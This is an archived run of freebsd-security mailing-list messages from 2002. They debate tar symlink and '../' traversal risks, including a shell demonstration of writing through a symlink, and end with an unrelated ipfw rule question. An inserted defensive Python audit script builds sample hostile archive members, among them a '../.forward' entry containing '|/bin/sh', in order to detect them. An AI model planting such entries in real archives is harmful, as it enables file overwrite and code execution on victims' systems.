essentially, it's like cd'ing into a symlinked directory: [jan@hi jan] {102}$ ln -s /tmp tmphome [jan@hi jan] {103}$ ls -al tmphome lrwxr-xr-x 1 jan jan 4 Oct 1 16:38 tmphome -> /tmp [jan@hi jan] {104}$ cd tmphome [jan@hi tmphome] {105}$ pwd /home/jan/tmphome [jan@hi tmphome] {106}$ ls -l drwxr-xr-x 2 jan wheel 512 Aug 1 13:21 ook drwx------ 2 jan wheel 512 Sep 27 13:36 orbit-jan drwxr-xr-x 3 root wheel 512 May 23 16:57 screens if i untar something to $HOME/tmphome, it'll end up in /tmp. > Our -L option does something entirely different, which is odd since I > got the impression from the comments made in this thread that both > FreeBSD and OpenBSD are both using gtar. no, it appears that FreeBSD is using gtar by default, which means the pax(1) link i posted earlier is wrong. From the FreeBSD tar(1) man page: COMPATIBILITY The -y is a FreeBSD localism. The GNU tar maintainer has now chosen -j as the official bzip2(1) compression option in GNU tar 1.13.18 and later. The -I option is for compatibility with Solaris's tar. [...] HISTORY The tar format has a rich history, dating back to Sixth Edition UNIX. The current implementation of tar is the GNU implementation, which originated as the public-domain tar written by John Gilmore. > I also don't think the -L option described above (or the lack of its > use) does anything to help the problem. If there is a symbolic link > named "foo" in the filesystem and the tarball contains a directory named > "foo", then it sounds like the symlink will be removed and replaced with > a directory if the "-L" option is not used, and the directory will be > created at the target of the symlink if the "-L" option is used. It > doesn't seem to say anything about what is done if there is no "foo" > directory in the tarball, but the tarball contains a "foo/bar" file. the -L flag in OpenBSD's tar will permit tar to follow symlinks, vs overwriting them or, worse, allowing something to overwrite outside of the untarring location.
this assumes i'm reading the man page correctly. > The only safe way of preventing symlinks from being followed would be to > lstat() each component of each path name in the tarball (which is still > not safe if there is a hostile process running that could substitute a > symlink for something that has already been checked). if you have a hostile process, you tend to be forced in to assuming the machine is hostile anyway, yes? -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:50:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9054337B401 for ; Tue, 1 Oct 2002 16:50:17 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3E1C343E75 for ; Tue, 1 Oct 2002 16:50:17 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91NoEs92505; Tue, 1 Oct 2002 16:50:14 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 16:50:14 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) 
In-Reply-To: <4.3.2.7.2.20021001173317.034cfe10@localhost> Message-ID: <20021001164903.H67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > I was using the ~ notation as a shorthand. The point is that if you can > get at a user's .forward file, that's sufficient to run code as him/her. > There are lots of other clever ways, too; that's just the first > example that came to mind. ah, sorry. i've been working on scripts today. i'm in a little bit of a literalist mindset. > Rather than give someone the opportunity to find a clever exploit, I think > we'd best just close the hole. ;-) well, agreed. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 17:12:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8848C37B401 for ; Tue, 1 Oct 2002 17:12:44 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9F8FB43E3B for ; Tue, 1 Oct 2002 17:12:40 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g920CRvU014531; Tue, 1 Oct 2002 17:12:31 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200210020012.g920CRvU014531@gw.catspoiler.org> Date: Tue, 1 Oct 2002 17:12:27 -0700 (PDT) From: Don Lewis Subject: Re: RE: Is FreeBSD's tar susceptible to this? To: jan@caustic.org Cc: brett@lariat.org, kris@obsecurity.org, dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG In-Reply-To: <20021001163239.L67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Oct, f.johan.beisser wrote: > On Tue, 1 Oct 2002, Don Lewis wrote: > >> On 1 Oct, f.johan.beisser wrote: >> > i don't believe that tar(1) will allow you to do that by default. >> >> I don't have an easy way of creating a malicious tarball to do this all >> in one shot, but it does look like our tar follows symlinks. I forgot about tar's "r" option ... > it doesn't include them by default, though. well, the symlink, yes; the > contents of the symlink, no. 
> > in your example, overwriting a given simlink works because it's > pre-existing, before the untarring of the file. essentially, it's like > cd'ing in to a symlinked directory: The symlink doesn't have to exist ahead of time. % rm -rf foo baz % ls foo baz ls: baz: No such file or directory ls: foo: No such file or directory % ln -s baz foo % tar cvf foo.tar foo foo % rm foo % mkdir foo baz % touch foo/bar % tar rvf foo.tar foo/bar foo/bar % rm -r foo % tar xvf foo.tar foo foo/bar % ls -al foo baz lrwxr-xr-x 1 dl dl 3 Oct 1 17:01 foo -> baz baz: total 28 drwxr-xr-x 2 dl dl 512 Oct 1 17:01 . drwxr-xr-x 64 dl dl 27648 Oct 1 17:01 .. -rw-r--r-- 1 dl dl 0 Oct 1 17:00 bar >> The only safe way of preventing symlinks from being followed would be to >> lstat() each component of each path name in the tarball (which is still >> not safe if there is a hostile process running that could substitute a >> symlink for something that has already been checked). > > if you have a hostile process, you tend to be forced in to assuming the > machine is hostile anyway, yes? Yes, I just didn't want anyone to get the impression that the checks that I mentioned above are safe in all cases. In the general case, even those checks are vulnerable to things like /tmp races. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 18:30:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 40B4437B401 for ; Tue, 1 Oct 2002 18:30:53 -0700 (PDT) Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by mx1.FreeBSD.org (Postfix) with SMTP id D7A2543E65 for ; Tue, 1 Oct 2002 18:30:52 -0700 (PDT) (envelope-from brian@hyperreal.org) Received: (qmail 12671 invoked from network); 2 Oct 2002 01:30:39 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 2 Oct 2002 01:30:39 -0000 Received: (qmail 76388 invoked by uid 1000); 2 Oct 2002 01:31:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Oct 2002 01:31:28 -0000 Date: Tue, 1 Oct 2002 18:31:28 -0700 (PDT) From: Brian Behlendorf To: Klaus Steden Cc: security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <20021001193024.A24818@cthulu.compt.com> Message-ID: <20021001183010.E58068-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 900/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Klaus Steden wrote: > With all due respect, running 'tar tf' before extracting a tarball as root is > a good idea, and a good habit to get into. So, fix the ports system then to include a step whereby someone has to pause the installation process to review the output of tar before allowing it to proceed. Oh, that would be a pain, wouldn't it? Like someone said, POLA. 
Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 19:12:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7254C37B401 for ; Tue, 1 Oct 2002 19:12:15 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3479543E75 for ; Tue, 1 Oct 2002 19:12:15 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g922CC793357; Tue, 1 Oct 2002 19:12:12 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 19:12:11 -0700 (PDT) From: "f.johan.beisser" To: Brian Behlendorf Cc: Klaus Steden , Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <20021001183010.E58068-100000@yez.hyperreal.org> Message-ID: <20021001190915.K67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brian Behlendorf wrote: > So, fix the ports system then to include a step whereby someone has to > pause the installation process to review the output of tar before allowing > it to proceed. if you're installing a port, i would tend to assume it's A) from the FreeBSD ports tree, and B) checked out, and using an md5 hash (already in the tree) that's separate/updated by the maintainer. in this case, the port maintainer is directly responsible for the port. of course, you have to trust your port maintainer to not be out to cause harm. trust does have to begin somewhere, after all. -------/ f. 
johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 1:42:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 717CF37B406 for ; Wed, 2 Oct 2002 01:42:08 -0700 (PDT) Received: from pegasus.wanadoo.be (pegasus.wanadoo.be [195.74.212.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id E118943E3B for ; Wed, 2 Oct 2002 01:42:06 -0700 (PDT) (envelope-from nick@wanadoo.be) Received: from nemesis.euronet.be (inphobia.office.be.wanadoo.com [195.74.207.35]) by pegasus.wanadoo.be (8.12.0/8.12.0) with SMTP id g928g475028313 for ; Wed, 2 Oct 2002 10:42:05 +0200 (MET DST) Date: Wed, 2 Oct 2002 10:42:03 +0200 From: Nick Nauwelaerts To: security@FreeBSD.ORG Subject: Re: Is FreeBSD's tar susceptible to this? Message-Id: <20021002104203.3abf8486.nick@wanadoo.be> In-Reply-To: <4.3.2.7.2.20021001113225.034331b0@localhost> References: <4.3.2.7.2.20021001104558.00d3f900@localhost> <4.3.2.7.2.20021001113225.034331b0@localhost> X-Mailer: Sylpheed version 0.8.3 (GTK+ 1.2.10; i386-unknown-openbsd3.1) X-Face: *=F*],{/L+"n0:jcG_+H@{$PsEWe]S[;DyQh3c)%M1@4jsmih3ro|CRLlJ9/DsQWt3M}!x#l@? Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-DCC-wanadoo-be-Metrics: pegasus 1023; Body=1 Fuz1=1 Fuz2=1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 01 Oct 2002 11:35:03 -0600 Brett Glass wrote: > Unfortunately, GNU tar has become so pervasive > that even OpenBSD (which avoids GNU software) uses > it. 
Gotta break this dependency upon GPLed code. FreeBSD's, NetBSD's & OpenBSD's tar/pax is BSD licensed, not GPLed. // nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 1:54:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5304C37B401 for ; Wed, 2 Oct 2002 01:54:50 -0700 (PDT) Received: from obsecurity.dyndns.org (adsl-64-165-226-88.dsl.lsan03.pacbell.net [64.165.226.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id 905A043E3B for ; Wed, 2 Oct 2002 01:54:49 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 134B466B79; Wed, 2 Oct 2002 01:54:49 -0700 (PDT) Date: Wed, 2 Oct 2002 01:54:48 -0700 From: Kris Kennaway To: Nick Nauwelaerts Cc: security@FreeBSD.ORG Subject: Re: Is FreeBSD's tar susceptible to this? Message-ID: <20021002085448.GA67610@xor.obsecurity.org> References: <4.3.2.7.2.20021001104558.00d3f900@localhost> <4.3.2.7.2.20021001113225.034331b0@localhost> <20021002104203.3abf8486.nick@wanadoo.be> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline In-Reply-To: <20021002104203.3abf8486.nick@wanadoo.be> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Oct 02, 2002 at 10:42:03AM +0200, Nick Nauwelaerts wrote: > On Tue, 01 Oct 2002 11:35:03 -0600 > Brett Glass wrote: > > > Unfortunately, GNU tar has become so pervasive > > that even OpenBSD (which avoids GNU software) uses > > it.
Gotta break this dependency upon GPLed code. > > FreeBSD's, NetBSD's & OpenBSD's tar/pax is BSD licensed, not GPLed. This thread is off-topic. Please restrain yourself from continuing the discussion in this forum. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 8:56:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 64ECB37B695 for ; Wed, 2 Oct 2002 08:56:31 -0700 (PDT) Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3CCDF43E77 for ; Wed, 2 Oct 2002 08:56:11 -0700 (PDT) (envelope-from keramida@ceid.upatras.gr) Received: from hades.hell.gr (patr530-b196.otenet.gr [212.205.244.204]) by mailsrv.otenet.gr (8.12.4/8.12.4) with ESMTP id g92FtYdY006655; Wed, 2 Oct 2002 18:55:47 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.6/8.12.6) with ESMTP id g92FtWmM001819; Wed, 2 Oct 2002 18:55:32 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from keramida@localhost) by hades.hell.gr (8.12.6/8.12.6/Submit) id g92FtQD4001814; Wed, 2 Oct 2002 18:55:26 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Wed, 2 Oct 2002 18:55:26 +0300 From: Giorgos Keramidas To: "f.johan.beisser" Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?)
Message-ID: <20021002155526.GA1669@hades.hell.gr> References: <4.3.2.7.2.20021001162821.036c0530@localhost> <20021001154626.M67581-100000@pogo.caustic.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20021001154626.M67581-100000@pogo.caustic.org> X-PGP-Fingerprint: C1EB 0653 DB8B A557 3829 00F9 D60F 941A 3186 03B6 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2002-10-01 15:56, "f.johan.beisser" wrote: > On Tue, 1 Oct 2002, Brett Glass wrote: > > Also, even if one does list the contents of a large archive (say, > > a complete distribution of Apache), you'd need to list it slowly > > and read it critically. Even a really long file name will scroll > > by FAST during a listing and could be missed. > > "tar tvf | [more || less]" doesn't seem that hard to me. A quick way of checking existing tarballs for upwards directory traversal is also: $ tar tvf tarball.tar | fgrep '..' $ This shouldn't print anything. If it does, be very cautious about untarring `tarball.tar'. Agreed, this isn't a "fix". But at least you can find out about nasty things before they have any chance to happen and become nastier. Giorgos. 
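Don Lewis's symlink demonstration (a `foo -> baz` link entry followed by a `foo/bar` file entry, so that `bar` lands in `baz/`) and Giorgos Keramidas's `tar tvf | fgrep '..'` pre-check can both be expressed as one metadata-only audit that reads the archive in member order and never extracts anything. The script below is an added example; it is not code from this thread nor from any BSD or GNU tar. It builds the sample archive in memory with Python's tarfile module (the member names and payloads are constructed for the example), then reports absolute names, `..` as a whole path component, and any member whose path passes through a symlink that an earlier member of the same archive created. Checking components rather than grepping for the substring `..` means a legitimate name such as `docs/file..name` is not flagged, which the naive check included for contrast does flag.

```python
"""Metadata-only audit of a tar archive for members that would escape the
extraction directory.  Added example, not code from the mailing-list thread
or from any tar implementation.  Nothing is extracted: only member names,
types and link targets are examined, in archive order."""
import io
import posixpath
import tarfile


def _components(name):
    """Split a member name into path components, dropping '' and '.'."""
    return [c for c in name.split("/") if c not in ("", ".")]


def audit_tar(data):
    """Return a list of (member_name, reason) findings; [] means clean.

    Flags, per member:
      * absolute member names,
      * '..' as a whole path component (so 'file..name' is not flagged),
      * a path that passes through a symlink created by an EARLIER member
        of the same archive (e.g. 'foo -> baz' followed by 'foo/bar'),
      * a symlink whose own target points outside the extraction directory.
    """
    findings = []
    symlinks = set()  # normalised names of symlink members seen so far
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf:  # TarFile iterates members in archive order
            parts = _components(m.name)
            rel = "/".join(parts)
            if m.name.startswith("/"):
                findings.append((m.name, "absolute path"))
            if ".." in parts:
                findings.append((m.name, "'..' path component"))
            # Every proper prefix of the path is a directory tar descends
            # through; if an earlier member made it a symlink, the write is
            # redirected to wherever the link points.
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in symlinks:
                    findings.append((m.name, f"path passes through symlink {prefix!r}"))
                    break
            if m.issym():
                symlinks.add(rel)
                target = m.linkname
                resolved = posixpath.normpath(posixpath.join(posixpath.dirname(rel), target))
                if target.startswith("/") or resolved == ".." or resolved.startswith("../"):
                    findings.append((m.name, f"symlink target {target!r} escapes extraction dir"))
    return findings


def naive_dotdot_check(data):
    """The substring test from the thread (tar tvf | fgrep '..'): every member
    name containing '..' anywhere, legitimate names included."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        return [m.name for m in tf if ".." in m.name]


def _add_file(tf, name, payload):
    info = tarfile.TarInfo(name)
    info.size = len(payload)
    tf.addfile(info, io.BytesIO(payload))


def build_sample_archive():
    """Constructed sample archive: the symlink-then-file sequence from the
    thread, two other hostile members, and one benign name containing '..'."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        link = tarfile.TarInfo("foo")                  # foo -> baz ...
        link.type = tarfile.SYMTYPE
        link.linkname = "baz"
        tf.addfile(link)
        _add_file(tf, "foo/bar", b"")                  # ... then foo/bar lands in baz/
        _add_file(tf, "../.forward", b"|/bin/sh\n")    # upward traversal
        _add_file(tf, "/etc/motd", b"x\n")             # absolute path
        _add_file(tf, "docs/file..name", b"ok\n")      # benign: '..' inside a component
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_archive()
    for name, reason in audit_tar(sample):
        print(f"{name}: {reason}")
    print("naive '..' grep would also flag:", naive_dotdot_check(sample))
```

Like `tar tvf`, this is a pre-check and not a fix: it inspects the archive, not the filesystem, so it cannot see a symlink that already exists in the extraction directory, and on a host with a hostile local process it is subject to the same check-then-use race Don Lewis describes. A tar that refuses to descend through symlinks while extracting is the only place that race can actually be closed.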
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 10:29:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A67FC37B404 for ; Wed, 2 Oct 2002 10:29:08 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id EBE2D43E65 for ; Wed, 2 Oct 2002 10:29:05 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.6/8.12.6) with ESMTP id g92HR4mO027573; Wed, 2 Oct 2002 20:27:05 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.6/8.12.6/Submit) id g92HR4lk027572; Wed, 2 Oct 2002 20:27:04 +0300 (EEST) Date: Wed, 2 Oct 2002 20:27:04 +0300 From: Alexandr Kovalenko To: Giorgos Keramidas Cc: "f.johan.beisser" , Brett Glass , security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Message-ID: <20021002172704.GA27421@nevermind.kiev.ua> References: <4.3.2.7.2.20021001162821.036c0530@localhost> <20021001154626.M67581-100000@pogo.caustic.org> <20021002155526.GA1669@hades.hell.gr> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <20021002155526.GA1669@hades.hell.gr> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Giorgos Keramidas! On Wed, Oct 02, 2002 at 06:55:26PM +0300, you wrote: > > "tar tvf | [more || less]" doesn't seem that hard to me. 
> A quick way of checking existing tarballs for upwards directory > traversal is also: > > $ tar tvf tarball.tar | fgrep '..' err, this doesn't seem correct to me. I think that 'file..name' is a correct filename. Yes. It is not commonly used but it could be. -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 12: 1:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B748737B401 for ; Wed, 2 Oct 2002 12:01:12 -0700 (PDT) Received: from fubar.adept.org (fubar.adept.org [63.147.172.249]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4C9BD43E77 for ; Wed, 2 Oct 2002 12:01:12 -0700 (PDT) (envelope-from mike@adept.org) Received: by fubar.adept.org (Postfix, from userid 1001) id E6F67154D5; Wed, 2 Oct 2002 11:58:32 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by fubar.adept.org (Postfix) with ESMTP id E6293154D3; Wed, 2 Oct 2002 11:58:32 -0700 (PDT) Date: Wed, 2 Oct 2002 11:58:32 -0700 (PDT) From: Mike Hoskins To: Brian Behlendorf Cc: Klaus Steden , Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <20021001183010.E58068-100000@yez.hyperreal.org> Message-ID: <20021002115522.S71488-100000@fubar.adept.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brian Behlendorf wrote: > Oh, that would be a pain, wouldn't it? > Like someone said, POLA. In all fairness, taking action that could potentially allow malicious manipulation of filesystems probably isn't very POLA. ;) Really though, I don't see what all the fuss is about.
Someone's said we'll have an RC3. I don't understand the huge rush to get new releases out the door (don't in my own company either). It'll be released when it's ready, that's why it's called a 'release'. If we need one more, or ten more RCs... I don't care. It means things are getting fixed while we're waiting.

From owner-freebsd-security Thu Oct 3 01:37:10 2002
Date: Thu, 3 Oct 2002 10:07:25 +0200
From: Aragon Gouveia
To: freebsd-security@freebsd.org
Subject: ipfw failing to "check-state"
Message-ID: <20021003080725.GF46789@phat.za.net>
X-Operating-System: FreeBSD 4.6-RC i386

Hi,

I've recently installed 4.7-RC from sources. I'm having difficulty getting dynamic rules working with ipfw.
Here is the output from 'ipfw -d show':

00100        0          0 check-state
01000      574     354032 allow tcp from any to 66.8.x.y 25 keep-state setup
65535 11589448 7623002626 allow ip from any to any
## Dynamic rules:
01000      397     312298 (T 299, slot 77) <-> tcp, 66.8.x.y 32145<-> 66.8.x.y 25
01000       13        572 (T 297, slot 97) <-> tcp, 196.26.x.y 1781<-> 66.8.x.y 25
01000        5        216 (T 297, slot 187) <-> tcp, 196.36.x.y 1525<-> 66.8.x.y 25
01000       21       1566 (T 299, slot 196) <-> tcp, 66.8.x.y 3794<-> 66.8.x.y 25

As can be seen above, no traffic is matching rule 100 as it should. If it weren't for my default allow rule, smtp connections would not work to the machine specified in rule 1000.

I'm using IPFW1, not IPFW2. I posted to questions@ yesterday but have received no response so far. This looks very much like an ipfw bug but I wanted to confirm it here before PR'ing. Has anyone else experienced this?

Thanks,
Aragon

From owner-freebsd-security Thu Oct 3 02:05:34 2002
Message-Id: <200210030905.g9395RY99870@www.wsf.at>
Date: Thu, 3 Oct 2002 09:05:27 -0000
To: "Aragon Gouveia",
Subject: Re: ipfw failing to "check-state"
From: "Thomas Wolf"
In-Reply-To: <20021003080725.GF46789@phat.za.net>

Aragon Gouveia wrote:
> Hi,
>
> I've recently installed 4.7-RC from sources. I'm having difficulty getting
> dynamic rules working with ipfw. Here is the output from 'ipfw -d show' :
>
> 00100        0          0 check-state
> 01000      574     354032 allow tcp from any to 66.8.x.y 25 keep-state setup
> 65535 11589448 7623002626 allow ip from any to any
> ## Dynamic rules:
> 01000      397     312298 (T 299, slot 77) <-> tcp, 66.8.x.y 32145<-> 66.8.x.y 25
> 01000       13        572 (T 297, slot 97) <-> tcp, 196.26.x.y 1781<-> 66.8.x.y 25
> 01000        5        216 (T 297, slot 187) <-> tcp, 196.36.x.y 1525<-> 66.8.x.y 25
> 01000       21       1566 (T 299, slot 196) <-> tcp, 66.8.x.y 3794<-> 66.8.x.y 25
>
> As can be seen above, no traffic is matching rule 100 as it should. If it
> weren't for my default allow rule, smtp connections would not work to the
> machine specified in rule 1000.
>
> I'm using IPFW1, not IPFW2. I posted to questions@ yesterday but have
> received no response so far. This looks very much like an ipfw bug but I
> wanted to confirm it here before PR'ing. Has anyone else experienced this?
>
> Thanks,
> Aragon

Hi,

Are you sure the traffic from 66.8.x.y 25 would be blocked without your default rule? Regarding the counter on rule 100, AFAIR ipfw did (does) never increment it on the check-state rule but on the 'parent' rule. From your example, everything looks just fine and the temporary rules seem to be ok. Try adding

1001 count tcp from 66.8.x.y 25 to any

I am sure you will never see traffic at this point.

regards
Thomas

P.S.: I just tried:

00001 check-state
00002 allow tcp from any to 212.16.37.103 25 keep-state setup
00003 deny ip from any to any via ed0

and it worked just fine.
The only difference is that I am running 4.6.2

From owner-freebsd-security Thu Oct 3 02:38:44 2002
Date: Thu, 3 Oct 2002 11:38:35 +0200
From: Aragon Gouveia
To: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw failing to "check-state"
Message-ID: <20021003093835.GG46789@phat.za.net>
References: <20021003080725.GF46789@phat.za.net> <200210030905.g9395RY99870@www.wsf.at>
In-Reply-To: <200210030905.g9395RY99870@www.wsf.at>
X-Operating-System: FreeBSD 4.6-RC i386

| By Thomas Wolf
| [ 2002-10-03 11:05 +0200 ]
> Are you sure the traffic from 66.8.x.y 25 would be blocked without
> your default rule ? Regarding the counter on rule 100,
> AFAIR ipfw did(does) never increment on the check-state rule but
> on the 'parent' rule). From your example, everything looks just fine
> and the temporary rules seem to be ok. Try adding
> 1001 count tcp from 66.8.x.y 25 to any
> I am sure you will never see traffic at this point.

I think you're right. I added the count rule after the keep-state rule and the counters didn't increment.
I can't check with a deny just yet, but in theory traffic shouldn't be blocked. I must have been doing something braindead yesterday that caused connections to be blocked. I assumed it was a problem with check-state when the counters weren't incrementing. :)

Thanks,
Aragon

From owner-freebsd-security Thu Oct 3 21:14:34 2002
